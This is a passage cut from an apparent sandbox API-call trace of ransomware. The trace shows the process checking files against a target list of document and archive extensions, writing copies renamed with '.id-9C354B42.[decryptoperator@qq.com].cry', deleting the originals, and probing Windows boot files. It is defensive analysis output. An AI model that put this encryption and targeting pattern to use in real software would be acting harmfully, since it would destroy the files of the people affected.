lpString2=".GIF") returned 1 [0055.623] lstrlenW (lpString=".xls") returned 4 [0055.623] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0055.623] lstrlenW (lpString=".xlsx") returned 5 [0055.623] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0055.623] lstrlenW (lpString=".ppt") returned 4 [0055.623] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0055.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0055.623] lstrlenW (lpString=".zip") returned 4 [0055.623] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0055.623] lstrlenW (lpString=".rar") returned 4 [0055.623] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0055.623] lstrlenW (lpString=".bz2") returned 4 [0055.623] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0055.623] lstrlenW (lpString=".7z") returned 3 [0055.624] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0055.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0055.624] lstrlenW (lpString=".dbf") returned 4 [0055.624] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0055.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0055.624] lstrlenW (lpString=".1cd") returned 4 [0055.624] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0055.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0055.624] lstrlenW (lpString=".jpg") returned 4 [0055.624] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0055.624] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=8772) returned 1 [0055.624] CloseHandle (hObject=0x21c) returned 1 [0055.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf")) returned 0x20 [0055.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.624] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.624] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0055.625] GetLastError () returned 0x0 [0055.625] ReadFile (in: hFile=0x21c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x2244, lpOverlapped=0x0) returned 1 [0055.631] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x2250, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x2250, lpOverlapped=0x0) returned 1 [0055.631] ReadFile (in: hFile=0x21c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.631] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.632] SetEndOfFile (hFile=0x184) returned 1 [0055.632] CloseHandle (hObject=0x184) returned 1 [0055.632] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.632] SetEndOfFile (hFile=0x21c) returned 1 [0055.633] CloseHandle (hObject=0x21c) returned 1 [0055.633] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.633] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf")) returned 1 [0055.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0055.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0055.633] lstrlenW (lpString=".doc") returned 4 [0055.633] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.633] lstrlenW (lpString=".docx") returned 5 [0055.633] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.633] lstrlenW (lpString=".pdf") returned 4 [0055.633] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.633] lstrlenW (lpString=".xls") returned 4 [0055.633] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.633] lstrlenW (lpString=".xlsx") returned 5 [0055.633] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.633] lstrlenW (lpString=".ppt") returned 4 [0055.633] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0055.633] lstrlenW (lpString=".zip") returned 4 [0055.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.633] lstrlenW (lpString=".rar") returned 4 [0055.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.633] lstrlenW (lpString=".bz2") returned 4 [0055.633] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.634] lstrlenW (lpString=".7z") returned 3 [0055.634] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0055.634] lstrlenW (lpString=".dbf") returned 4 [0055.634] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0055.634] lstrlenW (lpString=".1cd") returned 4 [0055.634] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0055.634] lstrlenW (lpString=".jpg") returned 4 [0055.634] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.634] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=14486) returned 1 [0055.634] CloseHandle (hObject=0x21c) returned 1 [0055.634] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf")) returned 0x20 [0055.634] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.634] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.635] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0055.635] GetLastError () returned 0x0 [0055.635] ReadFile (in: hFile=0x21c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x3896, lpOverlapped=0x0) returned 1 [0055.675] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x38a0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x38a0, lpOverlapped=0x0) returned 1 [0055.676] ReadFile (in: hFile=0x21c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.676] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.676] SetEndOfFile (hFile=0x184) returned 1 [0055.677] CloseHandle (hObject=0x184) returned 1 [0055.677] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.677] SetEndOfFile (hFile=0x21c) returned 1 [0055.677] CloseHandle (hObject=0x21c) returned 1 [0055.678] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.678] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf")) returned 1 [0055.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0055.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0055.678] lstrlenW (lpString=".doc") returned 4 [0055.678] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.678] lstrlenW (lpString=".docx") returned 5 [0055.678] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.678] lstrlenW (lpString=".pdf") returned 4 [0055.678] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.678] lstrlenW (lpString=".xls") returned 4 [0055.678] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.678] lstrlenW (lpString=".xlsx") returned 5 [0055.678] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.678] lstrlenW (lpString=".ppt") returned 4 [0055.678] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0055.678] lstrlenW (lpString=".zip") returned 4 [0055.678] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.678] lstrlenW (lpString=".rar") returned 4 [0055.678] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.678] lstrlenW (lpString=".bz2") returned 4 [0055.678] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.678] lstrlenW (lpString=".7z") returned 3 [0055.678] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0055.679] lstrlenW (lpString=".dbf") returned 4 [0055.679] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0055.679] lstrlenW (lpString=".1cd") returned 4 [0055.679] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0055.679] lstrlenW (lpString=".jpg") returned 4 [0055.679] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 Thread: id = 11 os_tid = 0x9ec [0035.250] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x6a0740 [0035.250] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x6b0748 [0035.251] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650480 [0035.251] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x6) returned 0x63a508 [0035.251] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650498 [0035.251] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x100000) returned 0x3630020 [0035.251] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6504b0 [0035.251] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6504b0, Size=0x20) returned 0x67fd88 [0035.251] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6504b0 [0035.251] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6504b0, Size=0x20) returned 0x67fd60 [0035.252] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0035.252] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0035.252] Wow64DisableWow64FsRedirection (in: OldValue=0x2b1ff58 | out: OldValue=0x2b1ff58*=0x0) returned 1 [0035.252] lstrlenW (lpString="kernel32.dll") returned 12 [0035.252] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd88 | out: hHeap=0x600000) returned 1 [0035.252] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0035.252] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd60 | out: hHeap=0x600000) returned 1 [0035.252] Sleep (dwMilliseconds=0x64) [0035.405] lstrlenW (lpString="BCD") returned 3 [0035.406] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.406] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.406] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.406] lstrlenW (lpString=".doc") returned 4 [0035.406] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0035.406] lstrlenW (lpString=".docx") returned 5 [0035.406] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0035.406] lstrlenW (lpString=".pdf") returned 4 [0035.406] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0035.406] lstrlenW (lpString=".xls") returned 4 [0035.406] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0035.406] lstrlenW (lpString=".xlsx") returned 5 [0035.406] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0035.406] lstrlenW (lpString=".ppt") returned 4 [0035.406] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0035.406] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.406] lstrlenW (lpString=".zip") returned 4 [0035.406] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0035.406] lstrlenW (lpString=".rar") returned 4 [0035.406] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0035.406] lstrlenW (lpString=".bz2") returned 4 [0035.406] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0035.406] lstrlenW (lpString=".7z") returned 3 [0035.406] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0035.406] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.406] lstrlenW (lpString=".dbf") returned 4 [0035.406] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0035.406] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.406] lstrlenW (lpString=".1cd") returned 4 [0035.407] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0035.407] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.407] lstrlenW (lpString=".jpg") returned 4 [0035.407] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0035.410] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.410] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.410] lstrlenW (lpString=".doc") returned 4 [0035.410] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0035.410] lstrlenW (lpString=".docx") returned 5 [0035.410] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0035.410] lstrlenW (lpString=".pdf") returned 4 [0035.411] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0035.411] lstrlenW (lpString=".xls") returned 4 [0035.411] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0035.411] lstrlenW (lpString=".xlsx") returned 5 [0035.411] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0035.411] lstrlenW (lpString=".ppt") returned 4 [0035.411] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0035.411] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.411] lstrlenW (lpString=".zip") returned 4 [0035.411] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0035.411] lstrlenW (lpString=".rar") returned 4 [0035.411] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0035.411] lstrlenW (lpString=".bz2") returned 4 [0035.411] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0035.411] lstrlenW (lpString=".7z") returned 3 [0035.411] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0035.411] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.411] lstrlenW (lpString=".dbf") returned 4 [0035.411] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0035.411] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.411] lstrlenW (lpString=".1cd") returned 4 [0035.411] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0035.411] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.411] lstrlenW (lpString=".jpg") returned 4 [0035.411] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0035.411] lstrcmpiW (lpString1=".LOG1", lpString2=".cry") returned 1 [0035.411] lstrlenW (lpString="BCD.LOG1") returned 8 [0035.411] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.412] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=0) returned 1 [0035.412] CloseHandle (hObject=0x17c) returned 1 [0035.412] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.412] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.412] lstrlenW (lpString=".doc") returned 4 [0035.412] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0035.412] lstrlenW (lpString=".docx") returned 5 [0035.412] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0035.412] lstrlenW (lpString=".pdf") returned 4 [0035.412] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0035.412] lstrlenW (lpString=".xls") returned 4 [0035.412] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0035.412] lstrlenW (lpString=".xlsx") returned 5 [0035.412] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0035.412] lstrlenW (lpString=".ppt") returned 4 [0035.412] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0035.412] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.412] lstrlenW (lpString=".zip") returned 4 [0035.412] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0035.412] lstrlenW (lpString=".rar") returned 4 [0035.412] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0035.412] lstrlenW (lpString=".bz2") returned 4 [0035.412] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0035.412] lstrlenW (lpString=".7z") returned 3 [0035.412] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0035.412] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.412] lstrlenW (lpString=".dbf") returned 4 [0035.412] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0035.412] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.412] lstrlenW (lpString=".1cd") returned 4 [0035.412] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0035.412] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.412] lstrlenW (lpString=".jpg") returned 4 [0035.412] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0035.413] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.413] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.413] lstrlenW (lpString=".doc") returned 4 [0035.413] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0035.413] lstrlenW (lpString=".docx") returned 5 [0035.413] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0035.413] lstrlenW (lpString=".pdf") returned 4 [0035.413] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0035.413] lstrlenW (lpString=".xls") returned 4 [0035.413] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0035.413] lstrlenW (lpString=".xlsx") returned 5 [0035.413] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0035.413] lstrlenW (lpString=".ppt") returned 4 [0035.413] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0035.413] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.413] lstrlenW (lpString=".zip") returned 4 [0035.413] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0035.413] lstrlenW (lpString=".rar") returned 4 [0035.413] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0035.413] lstrlenW (lpString=".bz2") returned 4 [0035.413] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0035.413] lstrlenW (lpString=".7z") returned 3 [0035.413] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0035.413] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.413] lstrlenW (lpString=".dbf") returned 4 [0035.413] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0035.413] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.413] lstrlenW (lpString=".1cd") returned 4 [0035.413] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0035.413] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.413] lstrlenW (lpString=".jpg") returned 4 [0035.413] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0035.413] lstrcmpiW (lpString1=".LOG2", lpString2=".cry") returned 1 [0035.413] lstrlenW (lpString="BCD.LOG2") returned 8 [0035.414] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.414] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=0) returned 1 [0035.414] CloseHandle (hObject=0x17c) returned 1 [0035.414] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.414] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.414] lstrlenW (lpString=".doc") returned 4 [0035.414] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0035.414] lstrlenW (lpString=".docx") returned 5 [0035.414] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0035.414] lstrlenW (lpString=".pdf") returned 4 [0035.414] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0035.414] lstrlenW (lpString=".xls") returned 4 [0035.414] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0035.414] lstrlenW (lpString=".xlsx") returned 5 [0035.414] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0035.414] lstrlenW (lpString=".ppt") returned 4 [0035.414] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0035.414] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.414] lstrlenW (lpString=".zip") returned 4 [0035.414] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0035.414] lstrlenW (lpString=".rar") returned 4 [0035.414] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0035.421] lstrlenW (lpString=".bz2") returned 4 [0035.421] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0035.421] lstrlenW (lpString=".7z") returned 3 [0035.421] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0035.421] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.434] lstrlenW (lpString=".dbf") returned 4 [0035.434] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0035.434] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.434] lstrlenW (lpString=".1cd") returned 4 [0035.434] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0035.434] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.434] lstrlenW (lpString=".jpg") returned 4 [0035.434] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0035.435] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.435] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.435] lstrlenW (lpString=".doc") returned 4 [0035.435] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0035.435] lstrlenW (lpString=".docx") returned 5 [0035.435] lstrcmpiW (lpString1=".docx", 